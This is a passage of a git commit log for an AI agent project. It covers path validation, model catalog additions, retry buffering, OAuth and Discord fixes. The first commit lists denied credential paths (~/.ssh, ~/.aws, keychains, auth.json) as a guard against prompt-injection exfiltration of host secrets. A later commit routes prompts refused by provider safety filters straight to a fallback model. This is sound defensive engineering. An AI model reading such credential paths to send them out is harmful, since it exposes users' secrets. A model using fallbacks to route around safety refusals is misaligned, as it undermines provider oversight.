showed the user a raw filepath in chat instead of the file.

Default flipped to denylist-only:
  • /etc, /proc, /sys, /dev, /root, /boot, /var/{log,lib,run}
  • $HOME/{.ssh,.aws,.gnupg,.kube,.docker,.config,.azure,.gcloud}
  • macOS Library/Keychains
  • $HERMES_HOME/{.env, auth.json, credentials}

The legacy allowlist+recency-window behavior stays available via
opt-in: `gateway.strict: true` in config.yaml (or
`HERMES_MEDIA_DELIVERY_STRICT=1`). Recommended for public-facing bots
where prompt injection from one user shouldn't be able to exfiltrate
the host's secrets to that same user.
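
A sketch of a denylist-only check over the roots listed above. The
function names are hypothetical, and placing Library/Keychains under
$HOME is an assumption; the real validate_media_delivery_path() also
handles strict mode, which is omitted here.

```python
from pathlib import Path

SYSTEM_ROOTS = ("/etc", "/proc", "/sys", "/dev", "/root", "/boot",
                "/var/log", "/var/lib", "/var/run")
HOME_ENTRIES = (".ssh", ".aws", ".gnupg", ".kube", ".docker", ".config",
                ".azure", ".gcloud", "Library/Keychains")
HERMES_ENTRIES = (".env", "auth.json", "credentials")


def denied_roots(home, hermes_home):
    roots = [Path(p) for p in SYSTEM_ROOTS]
    roots += [Path(home) / name for name in HOME_ENTRIES]
    roots += [Path(hermes_home) / name for name in HERMES_ENTRIES]
    # Resolve so that symlinked roots (e.g. /var/run -> /run) still match.
    return [root.resolve() for root in roots]


def is_delivery_allowed(path, home, hermes_home):
    """Default mode: allow any path that is not under a denied root."""
    resolved = Path(path).resolve()  # collapses '..' and symlinks
    for root in denied_roots(home, hermes_home):
        if resolved == root or root in resolved.parents:
            return False
    return True
```

Resolving before comparing matters: without it, a path such as
~/notes/../.ssh/id_rsa would slip past a plain prefix test.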

• `gateway/platforms/base.py` — `validate_media_delivery_path()`
  short-circuits to "return resolved if not under denylist" when
  strict is off. Strict mode preserves the original cache-then-
  allowlist-then-recency logic. New `_media_delivery_strict_mode()`
  reader for `HERMES_MEDIA_DELIVERY_STRICT`.
• `hermes_cli/config.py` — `gateway.strict: false` added to
  DEFAULT_CONFIG; existing keys documented as "only consulted in
  strict mode." No `_config_version` bump needed (deep-merge picks
  up the new default for old installs).
• `gateway/run.py` — bridges `gateway.strict` →
  `HERMES_MEDIA_DELIVERY_STRICT` at startup.
• `tools/send_message_tool.py` — schema description broadened back
  to plain "any local path."
• Tests — existing strict-path tests pinned to STRICT=1 so they keep
  exercising the legacy behavior; new `TestMediaDeliveryDefaultMode`
  with 8 cases covering the public default (stale .md accepted, any
  extension delivers, credential paths still blocked, strict env-var
  aliases, filter E2E).

Validation:
  - tests/gateway/test_platform_base.py: 119/119 pass
  - tests/gateway/test_tts_media_routing.py: 7/7 pass
  - tests/tools/test_send_message_tool.py: 121/121 pass
  - tests/hermes_cli/test_kanban_notify.py: 12/12 pass
  - tests/cron/test_scheduler.py: 120/120 pass
  - E2E via execute_code with real imports:
    • stale .md outside allowlist → accepted (default)
    • same path with STRICT=1 → rejected
    • $HOME/.ssh/id_rsa → rejected (default)
    • filter_local_delivery_paths([md, key]) → [md] only
    • gateway.strict in config.yaml → bridged to env (true=1, false=0)
2026-05-28 11:32:36 -07:00
Teknium 7050c052e3 fix(skills): pull full skills.sh catalog via sitemap (858 → 19,932) (#34025)
The skills.sh source was returning ~858 unique skills from a hardcoded
list of 28 popular keyword searches (each capped at 50 results). The
real catalog is ~20k — exposed via sitemap-skills-{1,2}.xml linked from
the site's sitemap index.

Switch the empty-query path in SkillsShSource.search() to walk the
sitemap instead of scraping the homepage's curated featured strip.
Falls back to the homepage scrape if the sitemap is unreachable.

build_skills_index.crawl_skills_sh() now just calls search("", limit=0)
instead of running 28 keyword searches — same result in one HTTP round
instead of 28.

Also handle an httpx + brotlicffi interaction: the per-skill sitemaps
are ~900 KB brotli-compressed and the cffi backend's streaming decode
chokes on them. Forcing Accept-Encoding to gzip dodges the bug without
requiring a brotli library upgrade.
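
A sketch of walking a sitemap index with the standard library. The
function names, the injected fetch callable, and the
"sitemap-skills-" filter are assumptions for illustration; in the real
source the fetch would be an HTTP GET sent with Accept-Encoding: gzip,
as described above.

```python
import xml.etree.ElementTree as ET

# Namespace defined by the sitemaps.org protocol.
SITEMAP_NS = {"sm": "http://www.sitemaps.org/schemas/sitemap/0.9"}


def sitemap_locs(xml_text):
    """Return every <loc> value in a sitemap or sitemap index."""
    root = ET.fromstring(xml_text)
    return [el.text.strip()
            for el in root.iterfind(".//sm:loc", SITEMAP_NS)
            if el.text]


def walk_sitemaps(index_xml, fetch, name_filter="sitemap-skills-"):
    """Collect unique URLs from the child sitemaps matching name_filter.

    `fetch` maps a sitemap URL to its XML text.
    """
    seen = set()
    urls = []
    for child in sitemap_locs(index_xml):
        if name_filter not in child:
            continue  # skip unrelated sitemaps in the index
        for url in sitemap_locs(fetch(child)):
            if url not in seen:
                seen.add(url)
                urls.append(url)
    return urls
```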

E2E against live skills.sh: 19,932 unique skills walked in 0.7s.
Tests: 137 pass (+1 new regression test exercising the sitemap path).

Floor for skills.sh raised 100 → 10,000 in EXPECTED_FLOORS so a future
regression hard-fails the build.
2026-05-28 11:28:12 -07:00
Austin Pickett 102eb4adc0 fix(nix): update hermes-web npmDepsHash for bumped @nous-research/ui
The web/package-lock.json changed when bumping @nous-research/ui to 0.18.0,
so the fetchNpmDeps fixed-output hash in nix/web.nix was stale and the nix
build failed. Update it to the hash prefetch-npm-deps computes for the new
lockfile.

Co-authored-by: Cursor <cursoragent@cursor.com>
2026-05-28 14:27:08 -04:00
Teknium b1d3ead7fb docs: tweak v0.15.0 release notes (#34037) 2026-05-28 11:20:52 -07:00
Austin Pickett c661fefa08 Merge remote-tracking branch 'origin/main' into refactor/use-ds-primitives
Co-authored-by: Cursor <cursoragent@cursor.com>

# Conflicts:
#	web/src/components/BottomPickSheet.tsx
#	web/src/components/SidebarFooter.tsx
#	web/src/components/ui/card.tsx
#	web/src/components/ui/confirm-dialog.tsx
#	web/src/pages/ChatPage.tsx
2026-05-28 14:20:49 -04:00
Teknium fe5c8ec4ad fix(dashboard): auto-reload SPA on stale-token 401 in loopback mode (#33861)
The dashboard's loopback auth uses an ephemeral '_SESSION_TOKEN' that
rotates on every server restart (hermes update, hermes gateway restart,
etc.). A tab kept open across the restart holds the OLD token in
window.__HERMES_SESSION_TOKEN__ from the previous HTML render, so every
'/api/*' fetch returns '401 Unauthorized' — surfacing in the UI as
'Failed to load Kanban board: 401: Unauthorized', 'Analytics 401', etc.
(#24186, #25275).

Before this patch the workaround was to manually clear site data or
hard-reload — annoying enough that users reported it as a regression
even though the token rotation is by design (security property:
stolen tokens can't survive a server restart).

The HTML response already sets 'Cache-Control: no-store, no-cache,
must-revalidate', so a reload reliably picks up the freshly-injected
token. fetchJSON now triggers that reload automatically on the first
loopback-mode 401, guarded by a sessionStorage flag so a genuine
auth bug (where even the new token fails) falls through to throw
on the second attempt instead of reload-looping. The flag is
cleared on any 2xx so a subsequent server restart in the same tab
gets its own reload cycle.

Gated mode is unaffected — that path already redirects to login_url
via the structured 401 envelope (Phase 6), and the new code is
explicitly skipped when window.__HERMES_AUTH_REQUIRED__ is set.

Refs #24186, #25275
2026-05-28 10:53:23 -07:00
Teknium 0c859a1c04 chore: release v0.15.0 (2026.5.28) (#34008)
* chore: release v0.15.0 (2026.5.28)

The Velocity Release. run_agent.py refactor (16k→3.8k LOC, -76%),
kanban grows into a multi-agent platform (104 PRs), cold-start perf wave
continues (-240ms / -47% per-turn function calls / -195ms per tool call),
session_search rebuilt (4500x faster, no LLM), promptware defense lands,
Bitwarden Secrets Manager integration, two new image_gen providers
(Krea 2, FAL plugin port), Nous-approved MCP catalog, OpenHands skill,
ntfy as 23rd messaging platform, deep xAI integration round.
15 P0 + 65 P1 closures. 747 PRs, 1,302 commits, 321 contributors.

* chore(release): bump acp_registry/agent.json to 0.15.0 (sync with pyproject)
2026-05-28 10:45:33 -07:00
kshitij 1a74795735 feat: add claude-opus-4.8 and claude-opus-4.8-fast (#34003)
Anthropic released Claude Opus 4.8 on 2026-05-27, available on
OpenRouter, Anthropic, Amazon Bedrock, and Claude Platform on AWS:
  - https://openrouter.ai/anthropic/claude-opus-4.8
  - https://openrouter.ai/anthropic/claude-opus-4.8-fast

The fast-mode variant is a separate model ID (anthropic/claude-opus-4.8-fast)
priced at 2x the base model, a notable improvement over the 6x premium
on older Opus generations (4.6/4.7). It is NOT a `speed: "fast"` request
parameter as on Opus 4.6; Anthropic's native fast-mode beta still only
covers Opus 4.6.

Changes:

  hermes_cli/models.py
    - Add anthropic/claude-opus-4.8 + anthropic/claude-opus-4.8-fast to
      the OpenRouter fallback snapshot and the Nous Portal curated list
      (live catalogs surface them automatically when reachable; the
      fallback list matters when the manifest fetch fails).
    - Add claude-opus-4-8 to the Anthropic-native picker list.

  agent/model_metadata.py
    - Register claude-opus-4-8 / claude-opus-4.8 in DEFAULT_CONTEXT_LENGTHS
      with 1M tokens (matches 4.6/4.7).

  agent/anthropic_adapter.py
    - Extend _XHIGH_EFFORT_SUBSTRINGS, _ADAPTIVE_THINKING_SUBSTRINGS, and
      _NO_SAMPLING_PARAMS_SUBSTRINGS with "4-8"/"4.8". 4.8 inherits the
      Opus 4.7 API contract: adaptive thinking only, xhigh effort level
      supported, sampling parameters (temperature/top_p/top_k) return 400.
    - Add claude-opus-4-8 to _ANTHROPIC_OUTPUT_LIMITS (128k max output,
      same as 4.7). Matches by substring so claude-opus-4-8-fast and
      date-stamped variants resolve correctly.

  agent/usage_pricing.py
    - Add anthropic/claude-opus-4-8: $5/$25 per MTok input/output, $0.50
      cache read, $6.25 cache write (same as 4.6/4.7).
    - Add anthropic/claude-opus-4-8-fast: $10/$50 per MTok (2x), $1.00
      cache read, $12.50 cache write. Per OpenRouter, the 2x premium is
      the only differentiator from regular Opus 4.8.
    - OpenRouter routes still pull pricing from the live /models API, so
      no static OpenRouter entry is needed.

  tests/agent/test_model_metadata.py
    - Extend the Claude 4.6+ context-length tag list with 4.8/4-8.

  website/static/api/model-catalog.json
    - Regenerated via `python scripts/build_model_catalog.py` to pick up
      the new entries in the OpenRouter and Nous Portal fallback lists.
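
The pricing entries above can be checked with a small sketch. The table
layout and the helper names lookup_pricing and turn_cost are
hypothetical; the dollar figures are the per-MTok prices quoted in this
message, and the dot-to-dash normalization mirrors the "both notations"
note below.

```python
# USD per million tokens, as listed under agent/usage_pricing.py.
PRICING = {
    "anthropic/claude-opus-4-8": {
        "input": 5.00, "output": 25.00,
        "cache_read": 0.50, "cache_write": 6.25,
    },
    "anthropic/claude-opus-4-8-fast": {
        "input": 10.00, "output": 50.00,
        "cache_read": 1.00, "cache_write": 12.50,
    },
}


def lookup_pricing(model):
    """Accept dot or dash notation, with or without the vendor prefix."""
    key = model.replace(".", "-")
    if "/" not in key:
        key = "anthropic/" + key
    return PRICING.get(key)


def turn_cost(model, input_tokens, output_tokens):
    """Cost in USD for one turn, ignoring cache reads and writes."""
    price = lookup_pricing(model)
    if price is None:
        raise KeyError(model)
    total = input_tokens * price["input"] + output_tokens * price["output"]
    return total / 1_000_000
```

For example, 1,000,000 input tokens plus 200,000 output tokens on the
base model cost 5 + 5 = 10 USD, and exactly twice that on the fast
variant.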

E2E verification (isolated sys.path import against the worktree):
  - _supports_adaptive_thinking, _supports_xhigh_effort, _forbids_sampling_params
    all return True for claude-opus-4.8 and claude-opus-4.8-fast.
  - _supports_fast_mode (the `speed: "fast"` request-parameter gate) stays
    False for 4.8 — fast mode is a separate model ID on OpenRouter, not a
    parameter Anthropic accepts on the base model.
  - DEFAULT_CONTEXT_LENGTHS resolves 1M for both notations.
  - resolve_billing_route + _lookup_official_docs_pricing resolve the
    correct $5/$25 (regular) and $10/$50 (fast) pricing for both
    dot-notation and dash-notation inputs.
  - 4.7 and 4.6 regression: behavior unchanged.
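
Illustration of the pricing check above, as a minimal sketch only. The
table name `_PRICING_PER_MTOK`, the helper `estimate_cost_usd`, and the
dot-to-dash normalization are assumptions made for this example; they are
not the actual contents of agent/usage_pricing.py. Only the dollar figures
come from this commit message.

```python
# Hypothetical pricing table; rates are USD per million tokens (MTok).
_PRICING_PER_MTOK = {
    "anthropic/claude-opus-4-8": {"input": 5.00, "output": 25.00},
    "anthropic/claude-opus-4-8-fast": {"input": 10.00, "output": 50.00},
}


def estimate_cost_usd(model: str, input_tokens: int, output_tokens: int) -> float:
    """Estimate request cost, accepting dot- or dash-notation model IDs."""
    # Assumed normalization: "4.8" and "4-8" resolve to the same entry.
    rates = _PRICING_PER_MTOK[model.replace(".", "-")]
    total = input_tokens * rates["input"] + output_tokens * rates["output"]
    return total / 1_000_000
```

With these rates, the fast variant costs exactly twice the regular model
for the same token counts, which is the 2x premium described above.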

Unit tests: 305 passed across tests/agent/test_usage_pricing.py,
test_model_metadata.py, tests/hermes_cli/test_model_catalog.py,
test_models.py, test_model_validation.py, test_models_dev_preferred_merge.py.
2026-05-28 10:31:59 -07:00
Ben Heidorn e8b9369a9d feat(openrouter): pass session_id in extra_body for sticky routing
OpenRouter supports a session_id field in extra_body that pins
multi-turn conversations to the same provider endpoint, enabling
prompt cache reuse across turns. The session_id was already threaded
through to build_extra_body() but never included in the returned dict.
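
A minimal sketch of the shape of the fix. The signature below is a
simplified, hypothetical stand-in for the real build_extra_body(), whose
parameters are not shown in this message; the only point is that the
session_id has to land in the returned dict.

```python
from typing import Any, Optional


def build_extra_body(
    provider_prefs: Optional[dict[str, Any]] = None,
    session_id: Optional[str] = None,
) -> dict[str, Any]:
    """Hypothetical, simplified version of build_extra_body()."""
    extra_body: dict[str, Any] = {}
    if provider_prefs:
        extra_body["provider"] = dict(provider_prefs)
    # The fix: include the session_id that was already being passed in.
    if session_id:
        extra_body["session_id"] = session_id
    return extra_body
```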

Co-Authored-By: Claude Opus 4 (1M context) <noreply@anthropic.com>
2026-05-28 08:52:19 -07:00
kshitij 0554ef1aa3 fix(agent): fallback immediately on provider content-policy blocks (#33883)
* fix(agent): fallback immediately on provider content-policy blocks

Provider safety-filter refusals (e.g. OpenAI Codex 'flagged for possible
cybersecurity risk', OpenAI moderation 'violates our usage policies',
Anthropic safety-system rejections, Azure content_filter) are
deterministic decisions about a specific prompt. Retrying the same
prompt up to api_max_retries times just reproduces the same refusal and
burns paid attempts before surfacing the generic 'API failed after 3
retries — <provider message>' to Telegram / cron with no indication that
the failure came from the model provider rather than Hermes itself.

Classify these as a new FailoverReason.content_policy_blocked
(non-retryable, should_fallback=True) and route them through the
existing is_client_error path so the loop:
  - skips the 3x retry backoff
  - activates a configured fallback model immediately
  - emits a clear provider-safety message to the user (not the generic
    'Non-retryable error (HTTP None)') and surfaces actionable guidance
    when no fallback is configured (rephrase, narrow context, or set
    fallback_model in hermes config)
  - returns a final_response that explicitly tells the user this came
    from the model provider, so gateway delivery is unambiguous and
    cron last_status reflects the safety block rather than a vague
    'agent reported failure'

Patterns are intentionally narrow — verbatim refusal phrasings keyed to
specific provider safety pipelines, not generic words like 'policy' or
'violation' that would collide with billing / format / auth errors.
Regression guards in test_18028_content_policy_blocked.py verify
billing 402s, generic 400s, and OpenRouter account-level
provider_policy_blocked remain distinct classifications.
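
A rough sketch of what "intentionally narrow" means here. The enum is
reduced to the one member this commit adds, and the pattern tuple and
`classify_content_policy` helper are illustrative assumptions built from
the phrasings quoted above, not the real classifier.

```python
from enum import Enum
from typing import Optional


class FailoverReason(Enum):
    # Only the member relevant to this sketch; the real enum has more.
    content_policy_blocked = "content_policy_blocked"


# Illustrative subset of the refusal phrasings quoted in this message.
_CONTENT_POLICY_PATTERNS = (
    "flagged for possible cybersecurity risk",
    "violates our usage policies",
    "content_filter",
)


def classify_content_policy(error_message: str) -> Optional[FailoverReason]:
    """Return content_policy_blocked only for known refusal phrasings."""
    lowered = error_message.lower()
    if any(pattern in lowered for pattern in _CONTENT_POLICY_PATTERNS):
        return FailoverReason.content_policy_blocked
    return None
```

Generic words such as "policy" or "violation" are deliberately absent from
the tuple, so a billing or account-level error falls through to None.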

Salvaged from #18164 onto current main (file restructure: loop logic
moved from run_agent.py to agent/conversation_loop.py, _emit_status →
_buffer_status), broadened patterns beyond the original OpenAI Codex
cybersecurity case to cover OpenAI moderation, Anthropic safety system,
and Azure content_filter; added user-actionable guidance and a clear
final_response so cron/gateway surfaces the policy block instead of a
generic non-retryable error, and added a regression-guard test module
mirroring the is_client_error predicate.

Addresses #18028.

Co-authored-by: Kuan-Chieh Huang <kchuang1015@users.noreply.github.com>

* chore: add kchuang1015 to AUTHOR_MAP

---------

Co-authored-by: Kuan-Chieh Huang <kchuang1015@users.noreply.github.com>
2026-05-28 07:28:24 -07:00
kshitij a82c88bac0 fix(xai-oauth): accept bare-code manual paste (state=None) (#26923) (#33880)
xAI's consent page renders the authorization code in-page rather than
redirecting through the 127.0.0.1 callback, so on remote/headless setups
(GCP Cloud Shell, Codespaces, container consoles, headless VPS) the only
value the user can paste is the opaque code with no `code=`/`state=`
query parameters. `_parse_pasted_callback` correctly returns
`state=None` for that input, but `_xai_oauth_loopback_login` then
validated state unconditionally and raised `xai_state_mismatch`,
making the documented bare-code paste path unreachable.

PKCE (code_verifier) still binds the token exchange to this client,
so the local state-equality check is redundant when there is no state
to compare. On the manual-paste path only, substitute the locally
generated state when the callback returned none — the rest of the
validation chain (code presence, error field, token exchange) is
unchanged. The loopback HTTP-server path still requires a matching
state (a real browser redirect always carries one).
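
The rule above can be sketched as follows. `resolve_callback_state` and
`StateMismatchError` are hypothetical names for illustration; the real
logic lives inside `_xai_oauth_loopback_login` and may be structured
differently.

```python
from typing import Optional


class StateMismatchError(Exception):
    """Hypothetical stand-in for the xai_state_mismatch failure."""


def resolve_callback_state(
    returned_state: Optional[str],
    expected_state: str,
    manual_paste: bool,
) -> str:
    """Return the state to validate against, or raise on mismatch."""
    # Bare-code paste: nothing came back, so substitute the local state.
    # This relaxation applies to the manual-paste path only.
    if returned_state is None and manual_paste:
        return expected_state
    if returned_state != expected_state:
        raise StateMismatchError("xai_state_mismatch")
    return returned_state
```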

Also: clarify the manual-paste prompt to mention xAI's in-page code
rendering so users know pasting the bare code on its own is expected.

Root-cause analysis from #26923 comment by @AccursedGalaxy (2026-05-20).

Tests
-----
* test_xai_loopback_login_manual_paste_bare_code_succeeds — positive
  end-to-end through the token exchange with state=None.
* test_xai_loopback_login_loopback_path_rejects_missing_state — the
  HTTP-server path still rejects state=None as a regression guard
  (the bare-code relaxation must NOT widen the loopback path).
* Existing test_xai_loopback_login_manual_paste_state_mismatch_raises
  continues to verify wrong (non-None) state is rejected on manual-paste.

Closes #26923.
2026-05-28 05:47:30 -07:00
helix4u c0d04694ea docs(email): clarify gateway vs Himalaya setup 2026-05-28 05:42:09 -07:00
Teknium 67011cc0d7 feat(agent): buffer retry/fallback status, surface only on terminal failure (#33816)
Users report that the CLI/gateway floods them with confusing retry chatter
during transient failures: a single 429 can produce 10+ "Provider/Endpoint/
Retrying in 5s..." lines before the request eventually succeeds. The same
firehose hits Telegram, Discord, Slack, etc. via _emit_status.

This patch defers all retry/fallback/compression status messages until we
know the outcome:
  - if the turn ultimately succeeds (any path: primary recovers, fallback
    activates, compression unsticks the request), the buffer is silently
    dropped — the user sees nothing.
  - if every retry and fallback exhausts and the turn fails, the buffer
    is flushed at the terminal-failure return so the user sees the full
    retry trace alongside the final error.

Backend logging (agent.log) is unchanged — every emission site still
writes to logger.warning/info, so post-mortem diagnosis is intact.

## What changed

run_agent.py: four new methods on AIAgent:
  _buffer_status(msg)   — defer an _emit_status call
  _buffer_vprint(msg)   — defer a _vprint(force=True) line
  _clear_status_buffer() — drop pending messages on success
  _flush_status_buffer() — replay pending messages on terminal failure
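
For orientation, a standalone sketch of the buffering idea. `StatusBuffer`
is a hypothetical class written for this example; the real helpers are
methods on AIAgent and keep the status and vprint kinds separate, which
this sketch collapses into one list.

```python
from typing import Callable


class StatusBuffer:
    """Hypothetical standalone version of the buffer/clear/flush helpers."""

    def __init__(self, emit: Callable[[str], None]) -> None:
        self._emit = emit
        self._pending: list[str] = []

    def buffer_status(self, msg: str) -> None:
        # Defer the message instead of emitting it immediately.
        self._pending.append(msg)

    def clear(self) -> None:
        # Success path: drop everything silently.
        self._pending.clear()

    def flush(self) -> None:
        # Terminal-failure path: replay in order, then start empty again.
        pending, self._pending = self._pending, []
        for msg in pending:
            try:
                self._emit(msg)
            except Exception:
                # Status delivery must never mask the real failure.
                pass
```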

agent/conversation_loop.py:
  - converted ~30 mid-process emit/vprint sites in the retry, fallback,
    compression, empty-response, and stream-watchdog paths to the buffered
    helpers
  - added _flush_status_buffer() at every terminal-failure return so users
    still see the trace when it actually matters
  - added _clear_status_buffer() at the "non-empty assistant content"
    point (NOT at "API call returned bytes" — empty responses still loop
    through the empty-retry path and would otherwise lose their trace
    between iterations)
  - silenced the two "(´;ω;`) oops, retrying..." / "(╥_╥) error,
    retrying..." spinner final-frame messages — the spinner now stops
    cleanly so retries leave no visible residue

agent/chat_completion_helpers.py: same conversion for codex TTFB / stale-
stream / fallback-activation status messages.

agent/stream_diag.py: _emit_stream_drop now buffers instead of emitting
directly.

## Tests

tests/run_agent/test_retry_status_buffer.py: 7 unit tests covering
accumulate→flush, clear-on-success, mixed kinds, empty-buffer no-op,
re-buffer after flush, exception swallowing.

Updated 3 existing tests that mocked _emit_status to also mock (or use)
_buffer_status:
  - tests/run_agent/test_run_agent.py::test_empty_response_emits_status_for_gateway
  - tests/run_agent/test_stream_drop_logging.py (2 tests)
  - tests/agent/test_codex_ttfb_watchdog.py (TTFB hint test)

## Validation

Live test: hermes chat -q against an unreachable endpoint with no fallback
exhausts retries and prints the full trace at the end. Same flow against
a working endpoint prints zero retry chatter.
2026-05-28 04:53:27 -07:00
Teknium e0572a6def fix(skills-hub): stop ellipsis-truncating the Identifier column (#33810)
`hermes skills search` rendered the Identifier column with the default
overflow behaviour, so long slugs (notably browse-sh — every browse-sh
skill ends in a `-XXXXXX` hash that's part of the identifier) were cut
to `browse-sh/weathe…`. Users copied the visible string into
`hermes skills install` and got a not-found error because the hash was
gone.

Set overflow="fold" on the Identifier column in both search tables
(`do_search` and the `_resolve_short_name` multi-match table) so long
slugs wrap onto a second line instead of getting eaten. Also add a
`--json` flag to `hermes skills search` (and the `/skills search`
slash variant) for scripting — emits a list of {name, identifier,
source, trust_level, description} objects with the full identifier,
which is the right shape for copy-paste pipelines too.

Closes #33674.
2026-05-28 04:53:13 -07:00
Teknium 5e1f793430 chore(web): remove web_crawl tool + provider crawl plumbing (#33824)
The web_crawl_tool() function was an orphan — no model schema registered
it, no skill or CLI command called it, and the agent had no way to invoke
it. PR #32608 proposed wiring it up as a model-callable tool; we've
decided not to expose crawl as a separate capability since web_search +
web_extract cover the use cases we want models to have.

Removed:
- tools/web_tools.py: web_crawl_tool() (~230 LOC)
- plugins/web/firecrawl/provider.py: supports_crawl() + crawl()
- plugins/web/tavily/provider.py: supports_crawl() + crawl()
- plugins/web/xai/provider.py: supports_crawl() override
- agent/web_search_provider.py: supports_crawl() + crawl() ABC methods
- agent/web_search_registry.py: get_active_crawl_provider() +
  the 'crawl' branch in _resolve()
- agent/display.py: web_crawl tool-progress rendering
- hermes_cli/config.py: 'web_crawl' from TAVILY_API_KEY.tools
- tools/website_policy.py: stale comment reference
- Tests: removed TestWebCrawlTavily class, the two website-policy
  web_crawl tests, the searxng/ddgs/brave-free crawl-error tests,
  the integration test_web_crawl method, and the
  test_unconfigured_crawl_emits_top_level_error test. Trimmed the
  capability-flag parametrize list and the WebSearchProvider ABC
  conformance tests.
- Docs: trimmed the Crawl column from capability tables in both EN
  and zh-Hans, updated the developer-guide ABC table.

Net: 25 files, +115/-1067.

Closes #33762 (the schema-text bug only existed if #32608 landed).
Supersedes #32608.
2026-05-28 04:52:42 -07:00
teknium1 b243afb68b fix(discord): skip backfill for auto-created threads and update test fakes
When auto-threading kicked in, the broadened backfill gate ran on the
freshly-created thread — but the thread has no prior context to fetch,
and the parent-channel reference passed to _fetch_channel_context would
have leaked unrelated context (see #31467).

Skip backfill when auto_threaded_channel is set.  Also teach the
_FakeTextChannel / _FakeThreadChannel test doubles to expose a no-op
history() async generator so the broadened gate doesn't trip
AttributeError → discord.Forbidden (MagicMock) → TypeError in the
existing auto-thread tests.  Add a regression test that asserts
auto-threaded messages do not trigger backfill.
2026-05-28 04:52:02 -07:00
teknium1 68ddd6b338 refactor(discord): inline backfill gate and document intent
Drop the _needed_mention local variable now that it has only one use,
inline its expression as _has_mention_gap, and add a comment explaining
the three backfill cases (mention-gated channel, thread, DM skip).

Behaviorally identical to the prior commit; cleanup only.

Co-authored-by: liuhao1024 <liuhao1024@users.noreply.github.com>
2026-05-28 04:52:02 -07:00
Pluviobyte eafe11d456 fix(gateway): backfill Discord thread context
Discord threads where the bot has already participated bypass mention gating by default, but the backfill check was still tied to the mention-needed condition. That meant follow-up thread messages could trigger a response without providing recent thread history to the session.

Run history backfill for thread messages whenever backfill is enabled, while keeping DMs skipped and channel mention backfill behavior unchanged. Add a regression test for a known thread follow-up without an explicit mention.

Fixes #33666

Co-authored-by: Cursor <cursoragent@cursor.com>
2026-05-28 04:52:02 -07:00
Teknium a1eaad2fc0 perf(skills-page): lazy-fetch the catalog instead of bundling 34MB into JS (#33809)
PR #33748 grew the live skills index from ~2k skills to ~69k, which made
the previous build-time bundling strategy untenable: the skills page's
JS chunk was about to balloon from ~1MB to ~35MB.  Initial page load
on mobile became unusable, search lagged on every keystroke against the
68k-item array, and JSON.parse blocked the main thread at startup.

Three changes:

1. extract-skills.py writes skills.json + skills-meta.json into
   website/static/api/ instead of website/src/data/.  Static-served by
   Vercel as /docs/api/skills.json (gzipped on the wire), same CDN that
   already serves skills-index.json.

2. skills/index.tsx drops the static import and fetches both files in
   parallel on mount.  Loading state shows '…' for the count; failures
   surface a small error pill instead of blanking the page.

3. Search is debounced 150ms and runs against a precomputed lowercase
   haystack stamped onto each row at load time.  Before: array-join +
   toLowerCase per row per keystroke on a 68k array.  After: single
   .includes() per row, deferred until typing settles.

Validation:

| | before | after |
|---|---|---|
| skills.json location | src/data/ (bundled) | static/api/ (CDN) |
| Largest JS chunk | would be ~35MB at 68k skills | 659 KB |
| Initial page render | wait for full parse | immediate, fetch async |
| Per-keystroke filter | join+lowercase x 68k rows | single includes x 68k rows |
| Debounce | none | 150ms |

Built locally for both en and zh-Hans locales; the 34MB skills.json now
lives in build/api/ and is served separately rather than inlined into
the page's bundle.

skills.json and skills-meta.json added to .gitignore — they were already
build artifacts, but the gitignore only listed skills-index.json before.
2026-05-28 03:41:43 -07:00
teknium1 6f9182cb34 fix(kanban): content-addressed corrupt-DB backup filename
Repeated quarantines of an unchanged corrupt kanban.db used to amplify
disk usage by N: the gateway dispatcher's 5-minute retry loop, multi-
profile fleets sharing one DB, and manual reopen attempts each produced
a fresh '.corrupt.<timestamp>.bak' copy of the same bytes. After 10
retries on a 100KB DB you had 11x the disk footprint of duplicate
corrupt data.

Derive the backup filename from a sha256 of the main DB instead of a
timestamp + collision counter. Same bytes → same filename → skip the
copy on retries. Different bytes (partial repair, further damage) →
different filename → preserve separately. Sidecar (-wal/-shm) backups
inherit the same content-addressed name.
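
A minimal sketch of the content-addressed naming, under assumptions: the
helper name `quarantine_corrupt_db`, the 16-character digest prefix, and
the exact filename layout are illustrative and not taken from the patch.
Sidecar handling is omitted.

```python
import hashlib
import shutil
from pathlib import Path


def quarantine_corrupt_db(db_path: Path) -> Path:
    """Copy db_path to a backup named after its sha256; skip if present."""
    # Assumed: a truncated hex digest is enough to tell backups apart.
    digest = hashlib.sha256(db_path.read_bytes()).hexdigest()[:16]
    backup = db_path.with_name(f"{db_path.name}.corrupt.{digest}.bak")
    # Same bytes -> same name -> nothing to copy on a retry.
    if not backup.exists():
        shutil.copy2(db_path, backup)
    return backup
```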

Inspired by @hanzckernel's PR #33529, simplified down to ~30 LOC: drop
the persistent JSON marker file, drop the atomic temp+fsync+rename
helper (shutil.copy2 is fine for a quarantine-only path), drop the
gateway-side WAL/SHM fingerprint extension (the existing
(path, mtime, size) tuple still gives the 5-minute retry semantics it
needs), and drop the gateway-side helper extraction. The existence of the
backup file IS the marker; no separate state is needed.

Test: tests/hermes_cli/test_kanban_db.py::test_repeated_corrupt_open_reuses_single_backup
proves 10 retries on the same corrupt bytes produce 1 backup (was 11),
and mutating the corrupt bytes produces a second backup with a
different fingerprint.

Refs #33529
Co-authored-by: hanzckernel <zhicheng.han@mathematik.uni-goettingen.de>
2026-05-28 03:38:09 -07:00
Teknium 432a691758 fix(update): stream + idle-kill npm run build so a stalled webui-build can't soft-brick the install (#33803)
`hermes update` ran the webui build with `capture_output=True` and no timeout. On low-memory hosts (WSL2's 4 GB default, small VPSes, antivirus stalls) Vite goes silent for minutes; users see a frozen terminal, decide the update is hung, and reboot. The reboot lands *after* `pip install -e .` has already touched the install but *before* the build completes, leaving the `hermes` launcher in place while `hermes_cli` is no longer importable — i.e. `ModuleNotFoundError: No module named 'hermes_cli'` (#33788, same class as #32384).

Changes:

- New `_run_with_idle_timeout()` helper: streams subprocess output line-by-line (so the user sees Vite progress in real time) and kills the process if no bytes appear on stdout/stderr for 180s. The existing stale-dist fallback (#23817) then serves the previous build instead of failing the update.
- `_build_web_ui()` uses the helper for `npm run build` (the actual stall site). `npm install` keeps `subprocess.run` + capture_output to preserve the existing EPERM-retry-on-Windows contract.
- Both `cmd_update` call sites print `→ Core update complete. Building dashboard (optional)...` before the webui build. The CLI is fully functional at this point; a webui-build failure only affects `hermes dashboard`. Telegraphing the boundary explicitly stops users from rebooting through the build step.
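
A sketch of the stream-and-idle-kill pattern described in the first bullet, not the actual `_run_with_idle_timeout()` implementation. The function name, signature, and return convention (None on idle-kill) are assumptions for this example. It also detects idleness per line rather than per byte, and it lets `FileNotFoundError` propagate for a missing binary instead of handling it.

```python
import queue
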